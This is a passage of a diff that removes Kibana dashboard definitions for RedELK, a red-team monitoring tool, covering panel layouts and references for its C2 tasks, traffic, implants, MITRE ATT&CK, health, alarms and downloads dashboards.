"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", - "title": "C2 tasks per host and user", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", - "w": 24, - "x": 0, - "y": 11 - }, - "panelIndex": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", - "panelRefName": "panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", - "title": "Cobalt Strike tasks per operator", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 14, - "i": "b038a84c-9db0-4266-af43-c8023da4781a", - "w": 48, - "x": 0, - "y": 20 - }, - "panelIndex": "b038a84c-9db0-4266-af43-c8023da4781a", - "panelRefName": "panel_b038a84c-9db0-4266-af43-c8023da4781a", - "title": "C2 tasks", - "type": "search", - "version": "7.8.0" - } - ], - "timeRestore": false, - "title": "RedELK - Tasks", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", - "type": "visualization" - }, - { - "id": "88db1280-d024-11ea-9301-a30a04251ae9", - "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", - "type": "visualization" - }, - { - "id": "a5554e20-d025-11ea-9301-a30a04251ae9", - "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", - "type": "visualization" - }, - { - "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", - "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", - "type": "visualization" - }, - { - "id": "cc523820-d021-11ea-9301-a30a04251ae9", - "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", - "type": "search" - } - ], - "sort": [ - 1642171876916, - 46 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "tags", - "negate": false, - "params": { - "query": "iplist_redteam" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "tags": "iplist_redteam" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "tags", - "negate": false, - "params": { - "query": "iplist_customer" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "tags": "iplist_customer" - } - } - } - ], - "query": { - "language": "lucene", - "query": "" - } - } - }, - "optionsJSON": { - "darkTheme": false, - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 4, - "i": "948c1286-d4de-44a6-8fb2-95bf9252ed00", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "948c1286-d4de-44a6-8fb2-95bf9252ed00", - "panelRefName": "panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 5, - "i": "ab9eb0fb-a164-4295-8177-865a2a67dccb", - "w": 36, - "x": 0, - "y": 4 - }, - "panelIndex": "ab9eb0fb-a164-4295-8177-865a2a67dccb", - "panelRefName": "panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", - "title": "Filters", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false, - "vis": { - "legendOpen": true - } - }, - "gridData": { - "h": 5, - "i": "c630a33e-6a98-466d-8223-fd83e6947b8c", - "w": 12, - "x": 36, - "y": 4 - }, - "panelIndex": "c630a33e-6a98-466d-8223-fd83e6947b8c", - "panelRefName": "panel_c630a33e-6a98-466d-8223-fd83e6947b8c", - "title": "HTTP Redir traffic per backend", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hiddenLayers": [], - "hidePanelTitles": false, - "isLayerTOCOpen": false, - "mapCenter": { - "lat": 14.5701, - "lon": 121.0254, - "zoom": 17 - }, - "openTOCDetails": [] - }, - "gridData": { - "h": 15, - "i": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", - "w": 24, - "x": 0, - "y": 9 - }, - "panelIndex": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", - "panelRefName": "panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", - "title": "HTTP redir traffic map", - "type": "map", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "fc254327-57ac-4e5f-88f7-a32d48570289", - "w": 24, - "x": 24, - "y": 9 - }, - "panelIndex": "fc254327-57ac-4e5f-88f7-a32d48570289", - "panelRefName": "panel_fc254327-57ac-4e5f-88f7-a32d48570289", - "title": "HTTP Redir traffic over time", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 15, - "i": "829f61cf-9374-4bb5-8214-34e6875e79da", - "w": 24, - "x": 0, - "y": 24 - }, - "panelIndex": "829f61cf-9374-4bb5-8214-34e6875e79da", - "panelRefName": "panel_829f61cf-9374-4bb5-8214-34e6875e79da", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 22, - "i": "0bc5f60b-f940-451a-886b-edff3512d180", - "w": 48, - "x": 0, - "y": 39 - }, - "panelIndex": "0bc5f60b-f940-451a-886b-edff3512d180", - "panelRefName": "panel_0bc5f60b-f940-451a-886b-edff3512d180", - "type": "search", - "version": "7.16.3" - } - ], - "refreshInterval": { - "pause": false, - "value": 30000 - }, - "timeFrom": "now-1d", - "timeRestore": true, - "timeTo": "now", - "title": "RedELK - Traffic dashboard", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "redirtraffic", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "redirtraffic", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": "index-pattern" - }, - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", - "type": "visualization" - }, - { - "id": "56350050-efe7-11eb-8a9f-2572da287875", - "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", - "type": "visualization" - }, - { - "id": "d625ba60-efe8-11eb-8a9f-2572da287875", - "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", - "type": "visualization" - }, - { - "id": "dd9e9510-efec-11eb-8a9f-2572da287875", - "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", - "type": "map" - }, - { - "id": "be08d380-efe9-11eb-8a9f-2572da287875", - "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", - "type": "visualization" - }, - { - "id": "cbb7d710-efee-11eb-8a9f-2572da287875", - "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", - "type": "visualization" - }, - { - "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", - "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", - "type": "search" - } - ], - "sort": [ - 1643016059071, - 291 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "RedELK implants dashboard", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "tags", - "negate": true, - "params": { - "query": "sandboxes_v01" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "tags": "sandboxes_v01" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "tags", - "negate": true, - "params": { - "query": "testsystems_v01" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "tags": "testsystems_v01" - } - } - } - ], - "query": { - "language": "lucene", - "query": "" - } - } - }, - "optionsJSON": { - "darkTheme": false, - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 15, - "i": "1", - "w": 24, - "x": 0, - "y": 2 - }, - "panelIndex": "1", - "panelRefName": "panel_1", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 15, - "i": "2", - "w": 24, - "x": 24, - "y": 2 - }, - "panelIndex": "2", - "panelRefName": "panel_2", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 15, - "i": "3", - "w": 24, - "x": 0, - "y": 17 - }, - "panelIndex": "3", - "panelRefName": "panel_3", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 22, - "i": "4", - "w": 48, - "x": 0, - "y": 32 - }, - "panelIndex": "4", - "panelRefName": "panel_4", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 15, - "i": "5", - "w": 24, - "x": 24, - "y": 17 - }, - "panelIndex": "5", - "panelRefName": "panel_5", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c", - "panelRefName": "panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 19, - "i": "b9915fcd-f22e-4326-986a-25684f947b79", - "w": 48, - "x": 0, - "y": 54 - }, - "panelIndex": "b9915fcd-f22e-4326-986a-25684f947b79", - "panelRefName": "panel_b9915fcd-f22e-4326-986a-25684f947b79", - "type": "search", - "version": "7.8.0" - } - ], - "refreshInterval": { - "pause": false, - "value": 30000 - }, - "timeFrom": "now-30d", - "timeRestore": true, - "timeTo": "now", - "title": "RedELK - Implants dashboard", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": "index-pattern" - }, - { - "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", - "name": "1:panel_1", - "type": "visualization" - }, - { - "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", - "name": "2:panel_2", - "type": "visualization" - }, - { - "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", - "name": "3:panel_3", - "type": "visualization" - }, - { - "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", - "name": "4:panel_4", - "type": "visualization" - }, - { - "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", - "name": "5:panel_5", - "type": "visualization" - }, - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", - "type": "visualization" - }, - { - "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", - "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", - "type": "search" - } - ], - "sort": [ - 1642171876916, - 56 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 17, - "i": "e4271670-160e-444d-bb78-46ae1e1c7339", - "w": 21, - "x": 0, - "y": 2 - }, - "panelIndex": "e4271670-160e-444d-bb78-46ae1e1c7339", - "panelRefName": "panel_e4271670-160e-444d-bb78-46ae1e1c7339", - "title": "MITRE ATT&CK Tactics", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 17, - "i": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8", - "w": 27, - "x": 21, - "y": 2 - }, - "panelIndex": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8", - "panelRefName": "panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", - "title": "MITRE ATT&CK Techniques", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 15, - "i": "de3ced26-2a55-43f5-af28-dc5c2b967c29", - "w": 24, - "x": 0, - "y": 19 - }, - "panelIndex": "de3ced26-2a55-43f5-af28-dc5c2b967c29", - "panelRefName": "panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 15, - "i": "38e24827-8707-4583-805a-98e4138495a7", - "w": 24, - "x": 24, - "y": 19 - }, - "panelIndex": "38e24827-8707-4583-805a-98e4138495a7", - "panelRefName": "panel_38e24827-8707-4583-805a-98e4138495a7", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 15, - "i": "60dc249a-1ad0-456c-850b-95c77ea0bc18", - "w": 48, - "x": 0, - "y": 34 - }, - "panelIndex": "60dc249a-1ad0-456c-850b-95c77ea0bc18", - "panelRefName": "panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", - "type": "search", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "3b895da0-50d0-49e0-a18d-790fd2dddaaa", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "3b895da0-50d0-49e0-a18d-790fd2dddaaa", - "panelRefName": "panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", - "type": "visualization", - "version": "7.8.0" - } - ], - "timeRestore": false, - "title": "RedELK - MITRE ATT&CK", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", - "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", - "type": "visualization" - }, - { - "id": "abdcd940-d050-11ea-9301-a30a04251ae9", - "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", - "type": "visualization" - }, - { - "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", - "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", - "type": "visualization" - }, - { - "id": "231792d0-d050-11ea-9301-a30a04251ae9", - "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", - "type": "visualization" - }, - { - "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", - "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", - "type": "search" - }, - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", - "type": "visualization" - } - ], - "sort": [ - 1642171876916, - 63 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 2, - "i": "5f3b82fd-613e-460e-a5a3-b7a9c9036060", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "5f3b82fd-613e-460e-a5a3-b7a9c9036060", - "panelRefName": "panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 2, - "i": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", - "w": 48, - "x": 0, - "y": 2 - }, - "panelIndex": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", - "panelRefName": "panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 7, - "i": "cd30bef4-7955-437a-adaf-317839c35931", - "w": 16, - "x": 0, - "y": 4 - }, - "panelIndex": "cd30bef4-7955-437a-adaf-317839c35931", - "panelRefName": "panel_cd30bef4-7955-437a-adaf-317839c35931", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 18, - "i": "cc62352b-f1ed-47fb-9687-d51a44693d13", - "w": 21, - "x": 16, - "y": 4 - }, - "panelIndex": "cc62352b-f1ed-47fb-9687-d51a44693d13", - "panelRefName": "panel_cc62352b-f1ed-47fb-9687-d51a44693d13", - "type": "search", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 18, - "i": "1d8af391-0559-412f-a001-12acc85b49ab", - "w": 11, - "x": 37, - "y": 4 - }, - "panelIndex": "1d8af391-0559-412f-a001-12acc85b49ab", - "panelRefName": "panel_1d8af391-0559-412f-a001-12acc85b49ab", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "cd45ce11-0279-476b-90c3-bd5733193a72", - "w": 16, - "x": 0, - "y": 11 - }, - "panelIndex": "cd45ce11-0279-476b-90c3-bd5733193a72", - "panelRefName": "panel_cd45ce11-0279-476b-90c3-bd5733193a72", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 16, - "i": "aa8ee839-556c-47ce-81af-451090b86f71", - "w": 48, - "x": 0, - "y": 22 - }, - "panelIndex": "aa8ee839-556c-47ce-81af-451090b86f71", - "panelRefName": "panel_aa8ee839-556c-47ce-81af-451090b86f71", - "type": "search", - "version": "7.10.0" - } - ], - "refreshInterval": { - "pause": true, - "value": 0 - }, - "timeFrom": "now-15y", - "timeRestore": true, - "timeTo": "now", - "title": "RedELK - Health", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "509e6a80-926a-11eb-a753-9da683898c26", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", - "type": "visualization" - }, - { - "id": "45491770-0886-11eb-a2d2-171dc8941414", - "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", - "type": "visualization" - }, - { - "id": "20fac240-926c-11eb-a753-9da683898c26", - "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", - "type": "visualization" - }, - { - "id": "87530b40-9269-11eb-a753-9da683898c26", - "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", - "type": "search" - }, - { - "id": "2f971ac0-926b-11eb-a753-9da683898c26", - "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", - "type": "visualization" - }, - { - "id": "2f77a150-926a-11eb-a753-9da683898c26", - "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", - "type": "visualization" - }, - { - "id": "654f76a0-9269-11eb-a753-9da683898c26", - "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", - "type": "search" - } - ], - "sort": [ - 1642171876916, - 71 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "RedELK alarms dashboard", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "74b481ca-ae10-4039-b6bf-474b5a409c0e", - "w": 18, - "x": 0, - "y": 2 - }, - "panelIndex": "74b481ca-ae10-4039-b6bf-474b5a409c0e", - "panelRefName": "panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", - "title": "Alarmed IOC over time", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "13abf5b9-28bf-4d51-9c63-2416603499e7", - "w": 6, - "x": 18, - "y": 2 - }, - "panelIndex": "13abf5b9-28bf-4d51-9c63-2416603499e7", - "panelRefName": "panel_13abf5b9-28bf-4d51-9c63-2416603499e7", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "e146bc43-4ec7-4fbb-8dcf-3df505b52932", - "w": 6, - "x": 24, - "y": 2 - }, - "panelIndex": "e146bc43-4ec7-4fbb-8dcf-3df505b52932", - "panelRefName": "panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "c8ae192f-f081-49eb-8e60-3122d0377314", - "w": 18, - "x": 30, - "y": 2 - }, - "panelIndex": "c8ae192f-f081-49eb-8e60-3122d0377314", - "panelRefName": "panel_c8ae192f-f081-49eb-8e60-3122d0377314", - "title": "Alarmed traffic over time", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 14, - "i": "b95813af-9600-4e44-93de-9acfaa6f911c", - "w": 48, - "x": 0, - "y": 13 - }, - "panelIndex": "b95813af-9600-4e44-93de-9acfaa6f911c", - "panelRefName": "panel_b95813af-9600-4e44-93de-9acfaa6f911c", - "title": "Alarmed IOC", - "type": "search", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 17, - "i": "67fd9bda-6d1a-4089-a588-b683ad113558", - "w": 48, - "x": 0, - "y": 27 - }, - "panelIndex": "67fd9bda-6d1a-4089-a588-b683ad113558", - "panelRefName": "panel_67fd9bda-6d1a-4089-a588-b683ad113558", - "title": "Alarmed traffic", - "type": "search", - "version": "7.8.0" - } - ], - "timeRestore": false, - "title": "RedELK - Alarms dashboard", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization" - }, - { - "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", - "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", - "type": "visualization" - }, - { - "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", - "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", - "type": "visualization" - }, - { - "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", - "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", - "type": "visualization" - }, - { - "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", - "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", - "type": "visualization" - }, - { - "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", - "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", - "type": "search" - }, - { - "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", - "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", - "type": "search" - } - ], - "sort": [ - 1642171876916, - 79 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "RedELK downloads dashboard", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 3, - "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2", - "w": 24, - "x": 0, - "y": 3 - }, - "panelIndex": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2", - "panelRefName": "panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", - "w": 7, - "x": 24, - "y": 3 - }, - "panelIndex": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", - "panelRefName": "panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "55aca97f-b1f0-43b1-af44-756fe59be5fc", - "w": 17, - "x": 31, - "y": 3 - }, - "panelIndex": "55aca97f-b1f0-43b1-af44-756fe59be5fc", - "panelRefName": "panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", - "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {}, - "sort": [ - "@timestamp", - "desc", - [ - "@timestamp", - "desc" - ] - ] - }, - "gridData": { - "h": 16, - "i": "9a987436-c698-4236-9b92-bfab81de8cc1", - "w": 48, - "x": 0, - "y": 14 - }, - "panelIndex": "9a987436-c698-4236-9b92-bfab81de8cc1", - "panelRefName": "panel_9a987436-c698-4236-9b92-bfab81de8cc1", - "type": "search", - "version": "7.16.3" - } - ], - "timeRestore": false, - "title": "RedELK - Downloads dashboard", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "643de010-d04c-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization" - }, - { - 